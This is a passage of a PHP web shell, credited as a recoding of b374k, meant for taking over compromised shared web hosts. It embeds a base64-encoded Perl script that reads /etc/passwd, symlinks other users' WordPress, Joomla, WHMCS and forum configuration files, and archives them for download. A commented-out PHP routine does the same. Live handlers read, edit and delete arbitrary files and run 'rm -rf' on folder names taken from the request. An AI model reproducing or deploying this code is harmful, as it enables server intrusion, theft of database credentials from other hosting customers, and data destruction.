CcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLWpvb21sYS1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy12YjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlnLnBocCcsJGhhaGFnYXkuJy1pbmNsdWRlcy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htMTUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy13aG0tV0hNQ1MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHAvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLXdobS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5Lictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1ob3N0cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGhhaGFnYXkuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGhhaGFnYXkuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRoYWhhZ2F5LictYmlsbGluZy50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1tYW5hZ2UudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL215L2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkaGFoYWdheS4nLXdobS1teXNob3AudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy16ZW5jYXJ0LnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC96ZW5jYXJ0L2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJGhhaGFnYXkuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkaGFoYWdheS4nLXNob3AtWkNzaG9wLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9TZXR0aW5ncy5waHAnLCRoYWhhZ2F5Lictc21mLnR4dCcpOyANCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zbWYvU2V0dGluZ3MucGhwJywkaGFoYWdheS4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL1NldHRpbmdzLnBocCcsJGhhaGFnYXkuJy1zbWYtZm9ydW0udHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRoYWhhZ2F5Lictc21mLWZvcnVtcy50eHQnKTsgDQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdXBsb2FkL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictdXAudHh0Jyk7IA0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRoYWhhZ2F5LictdXAyLnR4dCcpOyANCn0NCmlmICgkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICdQT1NUJykgew0KICByZWFkKFNURElOLCAkYnVmZmVyLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCn0gZWxzZSB7DQogICRidWZmZXIgPSAkRU5WeydRVUVSWV9TVFJJTkcnfTsNCn0NCkBwYWlycyA9IHNwbGl0KC8mLywgJGJ1ZmZlcik7DQpmb3JlYWNoICRwYWlyIChAcGFpcnMpIHsNCiAgKCRuYW1lLCAkdmFsdWUpID0gc3BsaXQoLz0vLCAkcGFpcik7DQogICRuYW1lID1+IHRyLysvIC87DQogICRuYW1lID1+IHMvJShbYS1mQS1GMC05XVthLWZBLUYwLTldKS9wYWNrKCJDIiwgaGV4KCQxKSkvZWc7DQogICR2YWx1ZSA9fiB0ci8rLyAvOw0KICAkdmFsdWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJEZPUk17JG5hbWV9ID0gJHZhbHVlOw0KfQ0KaWYgKCRGT1JNe3Bhc3N9IGVxICIiKXsNCnByaW50ICcNCjxib2R5IGNsYXNzPSJkeiIgYmdjb2xvcj0iIzIyMzM0NCI+DQo8cD5HcmFiIGNvbmZpZ3MgaW4gc2VydmVyPC9wPg0KPHA+T25seSBwYXRoIGxpa2UgIi9ob21lL1VTRVIvcHVibGljX2h0bWwiIGNhbiBiZSBzeW1saW5rZWQ8L3A+DQo8c3Bhbj5QYXN0ZSB0aGUgPGZvbnQgY29sb3I9InJlZCIvPiIvZXRjL3Bhc3N3ZCI8L2ZvbnQ+IGNvbnRlbnQuPC9zcGFuPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBzb2xpZCAjMDBGRjAwOyB3aWR0aDogIDU1NXB4OyBoZWlnaHQ6IDM3MHB4OyBiYWNrZ3JvdW5kLWNvbG9yOiNGRkZGRkY7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjlwdDsgY29sb3I6IGJsYWNrOyIgID48L3RleHRhcmVhPjxiciAvPg0KJm5ic3A7PHA+DQo8aW5wdXQgbmFtZT0idGFyIiB0eXBlPSJ0ZXh0IiBzdHlsZT0iYm9yZGVyOjJweCBzb2xpZCAjMDBGRjAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6I0ZGRkZGRjsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjpibGFjazsgIiAgLz48YnIgLz4NCiZuYnNwOzwvcD4NCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9IkhlamVzIGl0dSBjb25maWciIHN0eWxlPSJib3JkZXI6MnB4IHNvbGlkICMwMEZGMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6IGJsYWNrOyB0ZXh0LXRyYW5zZm9ybTp1cHBlcmNhc2U7IGhlaWdodDoyMzsgYmFja2dyb3VuZC1jb2xvcjojRkZGRkZGOyIgLz48L3A+DQo8L2Zvcm0+PC9zdHJvbmc+DQonOw0KfWVsc2V7DQpAbGluZXMgPTwkRk9STXtwYXNzfT47DQokeSA9IEBsaW5lczsNCm9wZW4gKE1ZRklMRSwgIj50YXIudG1wIik7DQpwcmludCBNWUZJTEUgInRhciAtY3pmICIuJEZPUk17dGFyfS4iLnRhciAiOw0KZm9yICgka2E9MDska2E8JHk7JGthKyspew0Kd2hpbGUoQGxpbmVzWyRrYV0gID1+IG0vKC4qPyk6eDovZyl7DQombGlsKCQxKTsNCnByaW50IE1ZRklMRSAkMS4iLnR4dCAiOw0KZm9yKCRrZD0xOyRrZDwxODska2QrKyl7DQpwcmludCBNWUZJTEUgJDEuJGtkLiIudHh0ICI7DQp9DQp9DQogfQ0KcHJpbnQnPGJvZHkgY2xhc3M9ImR6IiBiZ2NvbG9yPSIjMjIzMzQ0Ij4NCjxoMj5TdWNjZXNzIC4uICE8L2gyPg0KPHA+Q2xpY2sgPGEgaHJlZj0iLi8iIHRhcmdldD0iX0JMQU5LIi8+SEVSRTwvYT4gdG8gdmlldyBjb25maWdzPC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPkNsaWNrIEhlcmUgVG8gRG93bmxvYWQgVGFyIEZpbGU8L3NwYW4+PC9mb250PjwvYT48L3A+JzsNCn0NCn0NCiBwcmludCINCjwvYm9keT4NCjwvaHRtbD4iOw==");
                chmod($cwd.".PHHM_files/sym/perl/config.hax", 0755);
            }
            echo "<form action=\"?cwd=&amp;action=sym_auto_perl\" method=\"post\">\n".
                 "  <h1 class=\"cantik\">Config symlink &minus; PERL</h1>\n".
                 "  <iframe src=\".PHHM_files/sym/perl/config.hax\" style=\"width: 100%; height: 100%;\" class=\"kotak\"></iframe>\n".
                 "  <noframes>Your browser doesn't support frames, <a href=\".PHHM_files/sym/perl/config.hax\">Click here</a></noframes>\n".
                 "</form>";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "sym_auto_php"){
        /*if(!is_file($cwd.".PHHM_files/sym/php/.htaccess")){
        b64wrt($cwd.".PHHM_files/sym/php/.htaccess", "T3B0aW9ucyBhbGwNCkRpcmVjdG9yeUluZGV4IFN1eC5odG1sDQpBZGRUeXBlIHRleHQvcGxhaW4gLnBocA0KQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHANCkFkZFR5cGUgdGV4dC9wbGFpbiAuaHRtbA0KQWRkSGFuZGxlciB0eHQgLmh0bWwNClJlcXVpcmUgTm9uZQ0KU2F0aXNmeSBBbnk=");
        }
        $conflist = array("/public_html/includes/configure.php", "/public_html/os/includes/configure.php", "/public_html/oscom/includes/configure.php", "/public_html/oscommerce/includes/configure.php", "/public_html/oscommerces/includes/configure.php", "/public_html/shop/includes/configure.php", "/public_html/shopping/includes/configure.php", "/public_html/sale/includes/configure.php", "/public_html/amember/config.inc.php", "/public_html/config.inc.php", "/public_html/members/configuration.php", "/public_html/config.php", "/public_html/forum/includes/config.php", "/public_html/forums/includes/config.php", "/public_html/admin/conf.php", "/public_html/admin/config.php", "/public_html/wp-config.php", "/public_html/wp/wp-config.php", "/public_html/WP/wp-config.php", "/public_html/wp/beta/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/press/wp-config.php", "/public_html/wordpress/wp-config.php", "/public_html/Wordpress/wp-config.php", "/public_html/wordpress/beta/wp-config.php", "/public_html/news/wp-config.php", "/public_html/new/wp-config.php", "/public_html/blog/wp-config.php", "/public_html/beta/wp-config.php", "/public_html/blogs/wp-config.php", "/public_html/home/wp-config.php", "/public_html/protal/wp-config.php", "/public_html/site/wp-config.php", "/public_html/main/wp-config.php", "/public_html/test/wp-config.php", "/public_html/conf_global.php", "/public_html/include/db.php", "/public_html/connect.php", "/public_html/mk_conf.php", "/public_html/include/config.php", "/public_html/joomla/configuration.php", "/public_html/protal/configuration.php", "/public_html/joo/configuration.php", "/public_html/cms/configuration.php", "/public_html/site/configuration.php", "/public_html/main/configuration.php", "/public_html/news/configuration.php", "/public_html/new/configuration.php", "/public_html/home/configuration.php", "/public_html/vb/includes/config.php", "/public_html/vb3/includes/config.php", "/public_html/includes/config.php", "/public_html/whm/configuration.php", "/public_html/central/configuration.php", "/public_html/whm/whmcs/configuration.php", "/public_html/whm/WHMCS/configuration.php", "/public_html/whmc/WHM/configuration.php", "/public_html/whmcs/configuration.php", "/public_html/support/configuration.php", "/public_html/supp/configuration.php", "/public_html/secure/configuration.php", "/public_html/secure/whm/configuration.php", "/public_html/secure/whmcs/configuration.php", "/public_html/cpanel/configuration.php", "/public_html/panel/configuration.php", "/public_html/host/configuration.php", "/public_html/hosting/configuration.php", "/public_html/hosts/configuration.php", "/public_html/configuration.php", "/public_html/submitticket.php", "/public_html/clients/configuration.php", "/public_html/client/configuration.php", "/public_html/clientes/configuration.php", "/public_html/cliente/configuration.php", "/public_html/clientsupport/configuration.php", "/public_html/billing/configuration.php", "/public_html/manage/configuration.php", "/public_html/my/configuration.php", "/public_html/myshop/configuration.php", "/public_html/includes/dist-configure.php", "/public_html/zencart/includes/dist-configure.php", "/public_html/shop/includes/dist-configure.php", "/public_html/Settings.php", "/public_html/smf/Settings.php", "/public_html/forum/Settings.php", "/public_html/forums/Settings.php", "/public_html/upload/includes/config.php", "/public_html/up/includes/config.php");
        echo "<form action=\"?cwd=".$cwd."&amp;action=sym_auto_php\" method=\"post\">
        <h1 class=\"cantik\">Config symlink &minus; PHP</h1>";

        if($win && !$posix){ echo "Running on a <b>Windows</b> b0x? Are you sure?"; exit; }
        $getc = explode("\n", file_get_contents("/etc/passwd"));
        foreach($getc as $row){
        $exp = explode(":", $row);
        $user = $exp[0];
        $penuh = "/home/".$user;
        $kaun = 0;
        foreach($conflist as $eachcon){
        if(is_file($penuh.$eachcon)){
        if(symlink($penuh.$eachcon, $cwd.".PHHM_files/sym/php/".$user."---".$eachcon)){
        echo "File available &lt;&lt; Pwned =&lt; ".$penuh.$eachcon." to ".$cwd.".PHHM_files/sym/php/".$user.$eachcon."<br />";
        $kaun++;
        }
        }
        }
        return true;
        }
        if($kaun < 2){
        echo $kaun." file pwned using this tool !!";
        } elseif($kaun > 1){
        echo $kaun." files pwned using this tool !!";
        }
        echo "</form>";*/
            echo "This feature is currently disabled";
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "view"){
            $file = $_GET['file'];
            $buff = "<form action=\"?cwd=".$cwd."&amp;action=view;&amp;file=".$file."\" method=\"post\">\n";
            $content = file_get_contents($file);
            if(empty($file)){ $buff .= "GET Parameter \"file\" is empty <br /><br />"; }
            if(is_file($file)){
                $buff .= "Viewing file <b><a href=\"?cwd=".$cwd."&amp;action=edit&amp;file=".str_replace(" ", "+", $file)."\" title=\"Edit File\">".$file."</a></b> - ".ukuran($file)." <br /><br />\n".
                     "<div id=\"viewfile\">".nl2br(htmlspecialchars($content))."</div> <br /><br />";
            } else { $buff .= "File (".$file.") does not exist<br /><br />"; }
            $buff .= "</form>";
            echo $buff;
        }

        elseif(isset($_GET['action']) && $_GET['action'] == "edit"){
            if( isset($_POST['submit']) ){
                $file = $_POST['saveas'];
                $content = magicboom($_POST['content']);
                if($filez = fopen($file,"w")){
                    $time = @date("d-M-Y H:i",time());
                    if(fwrite($filez,$content)) $msg = "file saved @ ".$time;
                    else $msg = "failed to save"; fclose($filez);
                } else $msg = "permission denied";
            }
            if(!isset($file)) $file = $_GET['file'];
            if($filez = @fopen($file,"r")){
                $content = "";
                while(!feof($filez)){ $content .= htmlentities(fgets($filez)); }
                fclose($filez);
            }

            echo "<form action=\"?cwd=".$cwd."&amp;action=edit&amp;file=".$file."\" method=\"post\">\n".
                 "  <textarea cols=\"100\" rows=\"25\" name=\"content\" class=\"kotak\">".$content."</textarea><br />\n".
                 "  <input type=\"text\" name=\"saveas\" style=\"width: 50%;\" value=\"".$file."\" class=\"kotak\"/>\n".
                 "  <input type=\"submit\" name=\"submit\" value=\"Save file\" class=\"kotak\">\n".
                 "</form>";

            if(isset($_POST['submit'])) echo $msg;
        } else {
            if(isset($_GET['action']) && $_GET['action'] == "del" && $_GET['file'] != ""){
                $file = $_GET['file'];
                @unlink($file);
            }
            if(isset($_GET['action']) && $_GET['action'] == "rmdir" && $_GET['folder'] != ""){
                if($win && !$posix){
                    perintah("rmdir ".$_GET['folder']." /S /Q");
                } else {
                    perintah("rm -rf ".$_GET['folder']);
                }
            }
            if(isset($_GET['action']) && $_GET['action'] == "mkdir" && $_GET['folder'] != ""){
                $path = $cwd.$_GET['folder'];
                @mkdir($path);
            }
            $buff = filemanager();
            echo $buff;
        }
        ?>

        <!--<footer name="credit">
        &minus; <b>re</b>coded by Cai@nhax - Based on b374k NEC v3 - #PHHM #GILA #HEMPAS #HEJES &minus;
        </footer>-->

    </body>

</html>